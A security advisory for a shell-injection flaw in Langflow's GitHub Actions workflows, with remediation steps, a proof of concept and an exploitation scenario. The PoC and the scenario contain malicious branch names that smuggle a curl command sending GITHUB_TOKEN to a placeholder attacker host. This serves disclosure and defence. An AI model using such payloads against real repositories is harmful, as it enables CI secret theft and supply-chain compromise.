CVE-2026-33475
Severity: CRITICAL

Langflow's GitHub Actions CI/CD pipeline contains a critical unauthenticated shell injection flaw (CVSS 9.1), exploitable by any GitHub user who can fork the repository, via a maliciously named pull request branch. Update to Langflow v1.9.0 immediately and verify the integrity of any Langflow artifacts (PyPI packages, container images) consumed during the affected window. Audit all internal GitHub Actions workflows for unquoted `${{ github.* }}` interpolation in `run:` steps; this class of vulnerability is endemic across AI/ML open-source repositories.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| langflow | pip | < 1.9.0 | 1.9.0 |
Any environment running Langflow below v1.9.0, and any fork of the repository with the affected GitHub Actions workflows enabled, is in scope.
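A quick local exposure check is to compare the installed version against the patched release. A minimal sketch (the helper name is ours; a production check should use `packaging.version` rather than this naive dotted-number comparison):

```python
def is_vulnerable(installed: str, patched: str = "1.9.0") -> bool:
    """Naive dotted-version comparison against the patched release.

    Splits each version on '.' and compares numeric components as tuples.
    Pre-release suffixes are ignored; use packaging.version for real checks.
    """
    def key(v: str):
        return tuple(int(p) for p in v.split(".") if p.isdigit())
    return key(installed) < key(patched)
```

For example, `is_vulnerable("1.3.4")` is `True`, while `is_vulnerable("1.9.0")` and `is_vulnerable("1.10.0")` are `False`.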
Recommended Action
1. **Patch:** Update Langflow to v1.9.0.
2. **Audit:** Search all GitHub Actions workflows for direct `${{ github.head_ref }}`, `${{ github.event.pull_request.title }}`, and `${{ inputs.* }}` interpolation inside `run:` blocks, e.g. with CodeQL or the Semgrep `github-actions-injection` rule.
3. **Remediate:** Move context values into `env:` variables (`env: BRANCH: ${{ github.head_ref }}`) and reference `"$BRANCH"` in `run:` steps.
4. **Harden:** Restrict `GITHUB_TOKEN` permissions to the minimum required (e.g. `contents: read`, `packages: none`) via `permissions:` blocks.
5. **Verify:** For organizations consuming Langflow, validate checksums of packages installed during the pre-1.9.0 window against known-good hashes.
6. **Detect:** Instrument CI runners to alert on unexpected outbound HTTP/DNS requests, and review GitHub Actions audit logs for anomalous token usage during the affected period.
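The audit step can be approximated with a short script. A minimal sketch (a coarse line-level check, not a substitute for the CodeQL or Semgrep rules above; the function name and regex are illustrative):

```python
import re

# Coarse check: flags any ${{ github.* }} or ${{ inputs.* }} interpolation
# on a line. A real audit should parse the workflow YAML and inspect only
# `run:` blocks; this sketch errs on the side of over-reporting.
UNSAFE_INTERPOLATION = re.compile(
    r"\$\{\{\s*(github\.[\w.]+|inputs\.\w+)\s*\}\}"
)

def find_unsafe_interpolation(workflow_text: str) -> list[tuple[int, str]]:
    """Return (line_number, matched_expression) pairs for suspect lines."""
    hits = []
    for lineno, line in enumerate(workflow_text.splitlines(), start=1):
        for match in UNSAFE_INTERPOLATION.finditer(line):
            hits.append((lineno, match.group(0)))
    return hits
```

Running it over `run: echo "Branch: ${{ github.head_ref }}"` reports one hit; running it over a step that only references `$BRANCH` from `env:` reports none, which is the shape the remediation step drives toward.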
Technical Details
NVD Description
Langflow is a tool for building and deploying AI-powered agents and workflows. An unauthenticated remote shell injection vulnerability exists in multiple GitHub Actions workflows in the Langflow repository prior to version 1.9.0. Unsanitized interpolation of GitHub context variables (e.g., `${{ github.head_ref }}`) in `run:` steps allows attackers to inject and execute arbitrary shell commands via a malicious branch name or pull request title. This can lead to secret exfiltration (e.g., `GITHUB_TOKEN`), infrastructure manipulation, or supply chain compromise during CI/CD execution. Version 1.9.0 patches the vulnerability.

---

### Details

Several workflows in `.github/workflows/` and `.github/actions/` reference GitHub context variables directly in `run:` shell commands, such as:

```yaml
run: |
  validate_branch_name "${{ github.event.pull_request.head.ref }}"
```

Or:

```yaml
run: npx playwright install ${{ inputs.browsers }} --with-deps
```

Since `github.head_ref`, `github.event.pull_request.title`, and custom `inputs.*` may contain **user-controlled values**, they must be treated as **untrusted input**. Direct interpolation without proper quoting or sanitization leads to shell command injection.

---

### PoC

1. **Fork** the Langflow repository
2. **Create a new branch** with the name:

   ```bash
   injection-test && curl https://attacker.site/exfil?token=$GITHUB_TOKEN
   ```

3. **Open a Pull Request** to the main branch from the new branch
4. GitHub Actions will run the affected workflow (e.g., `deploy-docs-draft.yml`)
5. The `run:` step containing:

   ```yaml
   echo "Branch: ${{ github.head_ref }}"
   ```

   will execute:

   ```bash
   echo "Branch: injection-test"
   curl https://attacker.site/exfil?token=$GITHUB_TOKEN
   ```

6. The attacker receives the CI secret via the exfil URL.
---

### Impact

- **Type:** Shell Injection / Remote Code Execution in CI
- **Scope:** Any public Langflow fork with GitHub Actions enabled
- **Impact:** Full access to CI secrets (e.g., `GITHUB_TOKEN`), possibility to push malicious tags or images, tamper with releases, or leak sensitive infrastructure data

---

### Suggested Fix

Refactor affected workflows to **use environment variables** and wrap them in **double quotes**:

```yaml
env:
  BRANCH_NAME: ${{ github.head_ref }}
run: |
  echo "Branch is: \"$BRANCH_NAME\""
```

Avoid direct `${{ ... }}` interpolation inside `run:` for any user-controlled value.

---

### Affected Files (Langflow `1.3.4`)

- `.github/actions/install-playwright/action.yml`
- `.github/workflows/deploy-docs-draft.yml`
- `.github/workflows/docker-build.yml`
- `.github/workflows/release_nightly.yml`
- `.github/workflows/python_test.yml`
- `.github/workflows/typescript_test.yml`
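Combining the environment-variable fix with a least-privilege token, a hardened workflow might look like the following (the job and step names are illustrative, not taken from the Langflow repository). The `env:` assignment may still use `${{ ... }}`: GitHub writes the value into the process environment, so the shell later treats it as data rather than splicing it into the script text.

```yaml
permissions:
  contents: read   # GITHUB_TOKEN can read the repo and nothing else

jobs:
  ci:
    runs-on: ubuntu-latest
    steps:
      - name: Print branch safely
        env:
          # Untrusted value, but expanded by the shell, not the template engine
          BRANCH_NAME: ${{ github.head_ref }}
        run: |
          echo "Branch is: $BRANCH_NAME"
```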
Exploitation Scenario
An adversary targeting an AI/ML team's Langflow-based LLM agent pipeline forks the Langflow repository and creates a branch named `fix/docs && curl https://attacker.com/x?t=$GITHUB_TOKEN && echo`. They open a PR that triggers `deploy-docs-draft.yml`; the workflow's `run:` step `echo "Branch: ${{ github.head_ref }}"` resolves to the injected payload and executes it, sending the `GITHUB_TOKEN` out-of-band. The adversary authenticates to GitHub with the token, pushes a backdoored release tag with a modified langflow Python package containing a persistent reverse shell, and publishes it to PyPI. Organizations with auto-update enabled in their LLM agent CI pipelines pull the compromised version on the next build, granting the adversary RCE inside production AI infrastructure, potentially including access to model weights, vector databases, and inference endpoints.
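The artifact-verification step in the recommended actions can be scripted by comparing downloaded packages against known-good digests. A minimal sketch (the helper names are ours; the reference hashes must come from a trusted source such as PyPI's published release digests):

```python
import hashlib

def sha256_of(path: str) -> str:
    """Stream a file and return its hex SHA-256 digest."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(8192), b""):
            digest.update(chunk)
    return digest.hexdigest()

def verify_artifact(path: str, expected_sha256: str) -> bool:
    """True if the file's digest matches the known-good value."""
    return sha256_of(path) == expected_sha256.lower()
```

Run this against every Langflow wheel or sdist cached in internal mirrors or build caches from the pre-1.9.0 window; any mismatch against the trusted digest warrants treating the artifact, and any pipeline that consumed it, as compromised.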
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

References
- github.com/langflow-ai/langflow/security/advisories/GHSA-87cc-65ph-2j4w